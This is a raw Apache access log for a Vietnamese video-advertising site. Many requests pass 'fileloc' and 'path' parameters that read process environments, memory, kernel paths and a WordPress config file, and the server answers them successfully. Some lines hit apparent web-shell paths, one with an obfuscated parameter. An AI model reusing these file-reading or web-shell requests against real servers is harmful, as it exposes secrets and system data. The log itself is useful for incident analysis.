74.7.227.189 - - [10/Nov/2025:01:07:25 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory6/node0/memory0/node0/cpu1 HTTP/1.1" 200 3483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:25 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/environ&path=//proc/664 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
100.29.107.38 - - [10/Nov/2025:01:07:25 +0000] "GET /our-works/phu-long-corporate-video/?fileloc=//bin/vigpg&path=//bin HTTP/1.1" 200 3863 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:01:07:25 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fdoc%2Fdiffutils%2Fchangelog.Debian.gz&path=%2F%2Fproc%2F3264%2Froot%2Fusr%2Fshare%2Fdoc%2Fdiffutils HTTP/1.1" 200 2666 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.51 - - [10/Nov/2025:01:07:26 +0000] "GET /19hos33371.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/autogroup&path=//proc/695 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/oom_score_adj&path=//proc/661 HTTP/1.1" 200 2614 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
18.213.240.226 - - [10/Nov/2025:01:07:26 +0000] "GET /our-works/tvc-sjc/?fileloc=//usr/bin/dir&path=//usr/bin HTTP/1.1" 200 2603 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:07:26 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/mem&path=//proc/695 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/environ&path=//proc/661 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:27 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/arch_status&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:07:29 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fsys%2Fdevices%2Fpci0000%3A00%2F0000%3A00%3A02.0%2Ffirmware_node%2Fphysical_node%2Fdriver%2Fmodule%2Fsections%2F.data&path=%2F%2Fsys%2Fdevices%2Fpci0000%3A00%2F0000%3A00%3A02.0%2Ffirmware_node%2Fphysical_node%2Fdriver%2Fmodule%2Fsections HTTP/1.1" 200 2697 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
52.70.123.241 - - [10/Nov/2025:01:07:29 +0000] "GET /our-works/tvc-caltex-havoline/?path=//sys/kernel/slab/ip6_dst_cache HTTP/1.1" 200 4032 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:07:30 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/timerslack_ns&path=//proc/689 HTTP/1.1" 200 2611 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
66.249.66.4 - - [10/Nov/2025:01:07:30 +0000] "GET /?products=1770238084 HTTP/1.1" 200 23398 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.7390.122 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
74.7.227.189 - - [10/Nov/2025:01:07:31 +0000] "GET /?path=//sys/bus/node/devices/node0/memory6/subsystem/devices/memory1/node0/memory5/node0/cpu0 HTTP/1.1" 200 3445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:31 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/loginuid&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:32 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/environ&path=//proc/664 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:07:32 +0000] "GET /98zahh41970.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cpuset&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/auxv&path=//proc/695 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:33 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/gid_map&path=//proc/664 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.162.69.192 - - [10/Nov/2025:01:07:34 +0000] "GET /our-works/tvc-calci/?fileloc=//proc/1/net/netstat&path=//proc/1/net HTTP/1.1" 200 3842 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:07:34 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/mountinfo&path=//proc/695 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:35 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/pagemap&path=//proc/661 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:07:36 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flib%2Fapache2%2Fmodule%2Fenabled_by_maint%2Freqtimeout&path=%2F%2Fproc%2Fthread-self%2Froot%2Fvar%2Flib%2Fapache2%2Fmodule%2Fenabled_by_maint HTTP/1.1" 200 2681 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:07:36 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mem&path=//proc/661 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:39 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/uid_map&path=//proc/689 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.223.193.255 - - [10/Nov/2025:01:07:39 +0000] "GET /our-works/tvc-kimino/?path=//usr/share/bug/mdadm HTTP/1.1" 200 2951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
74.7.227.51 - - [10/Nov/2025:01:07:40 +0000] "GET /42tsrd11284.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.189 - - [10/Nov/2025:01:07:41 +0000] "GET /?path=//sys/bus/node/devices/node0/memory4/subsystem/devices/memory4/node0/cpu0/node0/cpu1 HTTP/1.1" 200 3480 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:41 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/autogroup&path=//proc/689 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
69.197.179.242 - - [10/Nov/2025:01:07:42 +0000] "GET /wp-includes/addc3d4c/edit.php?id=336228 HTTP/1.1" 499 0 "https://lamphimquangcao.net/wp-includes/addc3d4c/edit.php?id=336228" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
51.77.43.178 - - [10/Nov/2025:01:07:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/maps&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/gid_map&path=//proc/661 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:42 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/cgroup&path=//proc/695 HTTP/1.1" 200 2745 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:43 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/environ&path=//proc/689 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
54.166.126.132 - - [10/Nov/2025:01:07:43 +0000] "GET /our-works/tvc-calci/?fileloc=//proc/1/net/netstat&path=//proc/1/net HTTP/1.1" 200 3840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:07:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/mounts&path=//proc/695 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:44 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/gid_map&path=//proc/664 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:07:45 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig%2Fmlx90614.h&path=%2F%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Finclude%2Fconfig HTTP/1.1" 200 2655 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:07:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/patch_state&path=//proc/661 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:45 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/io&path=//proc/664 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:07:46 +0000] "GET /14ietv25842.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
18.205.91.101 - - [10/Nov/2025:01:07:47 +0000] "GET /our-works/tvc-jokky/?path=//etc/networkd-dispatcher/degraded.d HTTP/1.1" 200 2679 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.79.248.20 - - [10/Nov/2025:01:07:49 +0000] "GET /wp-content/upgrade-temp-backup/upgrade-temp-backup/index.php?ARRAY=7o2230223n313736323734303334392p2231223n22687474703n5p2s5p2s7n733634377631336o6s2r636p65726o742r70726s5p2s3s6p633q7068705s636s64655s6n6326743q313736323733363734392q3364366463626633666233363138636137373933663366313732356433303235222p2232223n226564386463313735326632393030396437393539336466386265323762333264222p2233223n226231616666386161376538363561333763653066363134633539323434666263222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231362q33382q35382q36312q37332q38362q3239227q HTTP/1.0" 504 167 "-" "-"
51.77.43.178 - - [10/Nov/2025:01:07:49 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/wchan&path=//proc/689 HTTP/1.1" 200 2607 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:07:49 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory8/node0/cpu0 HTTP/1.1" 200 3445 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
52.2.83.227 - - [10/Nov/2025:01:07:50 +0000] "GET /our-works/tvc-kimino/?path=//sys/fs/btrfs/features HTTP/1.1" 200 3375 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:07:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mem&path=//proc/689 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:50 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/clear_refs&path=//proc/695 HTTP/1.1" 200 2609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/mountstats&path=//proc/695 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:51 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/io&path=//proc/661 HTTP/1.1" 200 2604 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:07:51 +0000] "GET /14ietv25842.html?path=/var/www/lamphim/data/email HTTP/1.1" 200 2691 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/personality&path=//proc/661 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/io&path=//proc/664 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:52 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mountinfo&path=//proc/661 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.221.37.41 - - [10/Nov/2025:01:07:52 +0000] "GET /our-works/tvc-lapatie-2/?fileloc=//lib/systemd/catalog/systemd.zh_CN.catalog&path=//lib/systemd/catalog HTTP/1.1" 200 5524 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.50 - - [10/Nov/2025:01:07:53 +0000] "GET /our-works/tvc-caltex-havoline?path=%2F%2Fproc%2Fself%2Froot%2Fproc%2Fself%2Froot%2Flib%2Fmodules%2F5.4.0-214-generic%2Fbuild%2Finclude%2Frdma HTTP/1.1" 200 4431 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:07:53 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/limits&path=//proc/664 HTTP/1.1" 200 2871 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:07:53 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/cpu0/node0/memory7 HTTP/1.1" 200 3411 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:54 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/gid_map&path=//proc/689 HTTP/1.1" 200 2623 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:54 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/auxv&path=//proc/689 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:07:54 +0000] "GET /14ietv25842.html?path=/var/www/lamphim/data/tmp HTTP/1.1" 200 2969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/arch_status&path=//proc/695 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
52.0.218.219 - - [10/Nov/2025:01:07:55 +0000] "GET /our-works/tvc-relax-gaba/?fileloc=//usr/share/apport/apportcheckresume&path=//usr/share/apport HTTP/1.1" 200 3918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:07:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mountinfo&path=//proc/689 HTTP/1.1" 200 3757 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:55 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/cmdline&path=//proc/695 HTTP/1.1" 200 2643 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/numa_maps&path=//proc/695 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:07:56 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/projid_map&path=//proc/661 HTTP/1.1" 200 2624 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:07:57 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory0/node0/memory6/node0/cpu1 HTTP/1.1" 200 3485 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
74.7.227.51 - - [10/Nov/2025:01:07:58 +0000] "GET /42tsrd11284.html?path=/var/www/lamphim/data/php-bin HTTP/1.1" 200 2695 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:07:59 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/limits&path=//proc/661 HTTP/1.1" 200 2870 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
23.21.175.228 - - [10/Nov/2025:01:07:59 +0000] "GET /our-works/tvc-jokky/?fileloc=//etc/cron.daily/apport&path=//etc/cron.daily HTTP/1.1" 200 2800 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:00 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mounts&path=//proc/689 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:01 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/autogroup&path=//proc/695 HTTP/1.1" 200 2617 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.50 - - [10/Nov/2025:01:08:01 +0000] "GET /our-works/phim-viral-nestle?fileloc=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Farch%2Fs390%2Finclude%2Fasm%2Fcpu_mcf.h&path=%2F%2Fproc%2F3264%2Froot%2Flib%2Fmodules%2F5.4.0-216-generic%2Fbuild%2Farch%2Fs390%2Finclude%2Fasm HTTP/1.1" 200 3758 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.77.43.178 - - [10/Nov/2025:01:08:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/io&path=//proc/689 HTTP/1.1" 200 2603 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:03 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/comm&path=//proc/695 HTTP/1.1" 200 2618 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:04 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/oom_adj&path=//proc/695 HTTP/1.1" 200 2610 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.189 - - [10/Nov/2025:01:08:05 +0000] "GET /?path=//sys/bus/node/devices/node0/memory5/subsystem/devices/memory2/node0/memory8/node0/cpu1 HTTP/1.1" 200 3483 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:05 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/cgroup&path=//proc/689 HTTP/1.1" 200 2759 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:06 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/loginuid&path=//proc/664 HTTP/1.1" 200 2619 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.51 - - [10/Nov/2025:01:08:06 +0000] "GET /36qmst35100.html?path=/var/www/lamphim/data HTTP/1.1" 200 3277 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
51.77.43.178 - - [10/Nov/2025:01:08:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/664/limits&path=//proc/664 HTTP/1.1" 200 2871 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:07 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/mounts&path=//proc/661 HTTP/1.1" 200 3350 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.207.207.36 - - [10/Nov/2025:01:08:08 +0000] "GET /our-works/tvc-relax-gaba/?fileloc=//usr/share/apport/apportcheckresume&path=//usr/share/apport HTTP/1.1" 200 3918 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
51.77.43.178 - - [10/Nov/2025:01:08:08 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/661/sched&path=//proc/661 HTTP/1.1" 200 3027 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
190.92.209.218 - - [10/Nov/2025:01:08:10 +0000] "GET /3d-film-traning/video/phim-3d?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-config-sample.php&path=/var/www/lamphim/data/www/lamphimquangcao.net HTTP/1.1" 200 3946 "http://lamphimquangcao.net/3d-film-traning/video/phim-3d?fileloc=/var/www/lamphim/data/www/lamphimquangcao.net/wp-config-sample.php&path=/var/www/lamphim/data/www/lamphimquangcao.net" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.64 Safari/537.36 Edg/101.0.1210.47"
51.77.43.178 - - [10/Nov/2025:01:08:10 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/695/auxv&path=//proc/695 HTTP/1.1" 200 2605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.77.43.178 - - [10/Nov/2025:01:08:11 +0000] "GET /video/quang-cao-3d-khuyen-mai-100.html?fileloc=//proc/689/mountstats&path=//proc/689 HTTP/1.1" 200 2608 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
44.215.210.112 - - [10/Nov/2025:01:08:11 +0000] "GET /our-works/tvc-jokky/?path=//sys/devices/kprobe/power HTTP/1.1" 200 3256 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
